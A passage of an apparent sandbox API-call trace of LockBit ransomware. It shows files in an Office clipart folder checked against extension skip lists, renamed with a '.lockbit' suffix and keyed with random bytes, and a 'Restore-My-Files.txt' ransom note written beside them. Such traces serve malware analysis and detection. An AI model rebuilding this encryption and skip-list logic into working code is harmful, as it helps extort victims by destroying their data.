lpString2=".WMF") returned 1 [0118.651] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.652] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.652] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.lockbit") returned 72 [0118.652] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.657] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.657] malloc (_Size=0x40068) returned 0x3df0008 [0118.657] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22116) returned 1 [0118.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0118.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0118.659] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.669] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.669] malloc (_Size=0xa6) returned 0x77d7a8 [0118.669] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.670] free (_Block=0x77d7a8) [0118.670] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.670] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.670] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.670] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a1f0e00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x538bb350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a1f0e00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x3dec, dwReserved0=0x0, dwReserved1=0x0, cFileName="HM00116_.WMF", cAlternateFileName="")) returned 1 [0118.670] lstrcmpiW (lpString1=".", lpString2="HM00116_.WMF") returned -1 [0118.670] lstrcmpiW (lpString1="..", lpString2="HM00116_.WMF") returned -1 [0118.670] PathFindExtensionW (pszPath="HM00116_.WMF") returned=".WMF" [0118.671] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.671] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.672] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.672] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HM00116_.WMF") returned 1 [0118.672] lstrcmpiW (lpString1="ntldr", lpString2="HM00116_.WMF") returned 1 [0118.672] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HM00116_.WMF") returned 1 [0118.672] lstrcmpiW (lpString1="bootsect.bak", lpString2="HM00116_.WMF") returned -1 [0118.672] lstrcmpiW (lpString1="autorun.inf", lpString2="HM00116_.WMF") returned -1 [0118.672] lstrcmpiW (lpString1="thumbs.db", lpString2="HM00116_.WMF") returned 1 [0118.672] lstrcmpiW (lpString1="iconcache.db", lpString2="HM00116_.WMF") returned 1 [0118.672] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.673] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned=".WMF" [0118.673] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.673] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.673] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.674] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.674] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.lockbit") returned 72 [0118.674] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0118.674] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.674] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.674] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15852) returned 1 [0118.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.675] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.676] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.676] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.679] malloc (_Size=0xa6) returned 0x77d7a8 [0118.679] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.680] free (_Block=0x77d7a8) [0118.680] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.680] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.680] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.680] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bef4100, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bef4100, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x0, dwReserved1=0x0, cFileName="HM00172_.WMF", cAlternateFileName="")) returned 1 [0118.680] lstrcmpiW (lpString1=".", lpString2="HM00172_.WMF") returned -1 [0118.680] lstrcmpiW (lpString1="..", lpString2="HM00172_.WMF") returned -1 [0118.680] PathFindExtensionW (pszPath="HM00172_.WMF") returned=".WMF" [0118.680] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.680] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.680] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.680] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.680] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.680] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.681] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.681] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.682] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HM00172_.WMF") returned 1 [0118.682] lstrcmpiW (lpString1="ntldr", lpString2="HM00172_.WMF") returned 1 [0118.682] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HM00172_.WMF") returned 1 [0118.682] lstrcmpiW (lpString1="bootsect.bak", lpString2="HM00172_.WMF") returned -1 [0118.682] lstrcmpiW (lpString1="autorun.inf", lpString2="HM00172_.WMF") returned -1 [0118.682] lstrcmpiW (lpString1="thumbs.db", lpString2="HM00172_.WMF") returned 1 [0118.682] lstrcmpiW (lpString1="iconcache.db", lpString2="HM00172_.WMF") returned 1 [0118.682] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.683] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned=".WMF" [0118.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.683] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.683] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.684] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.684] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.684] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.684] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.lockbit") returned 72 [0118.684] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.684] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.684] malloc (_Size=0x40068) returned 0x3e70008 [0118.684] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2832) returned 1 [0118.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.686] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.691] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.691] malloc (_Size=0xa6) returned 0x77d7a8 [0118.691] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.691] free (_Block=0x77d7a8) [0118.691] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.691] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.692] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.692] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7410300, ftCreationTime.dwHighDateTime=0x1bf3bd8, ftLastAccessTime.dwLowDateTime=0x538bb350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd7410300, ftLastWriteTime.dwHighDateTime=0x1bf3bd8, nFileSizeHigh=0x0, nFileSizeLow=0x10ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HM00426_.WMF", cAlternateFileName="")) returned 1 [0118.692] lstrcmpiW (lpString1=".", lpString2="HM00426_.WMF") returned -1 [0118.692] lstrcmpiW (lpString1="..", lpString2="HM00426_.WMF") returned -1 [0118.692] PathFindExtensionW (pszPath="HM00426_.WMF") returned=".WMF" [0118.692] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.692] 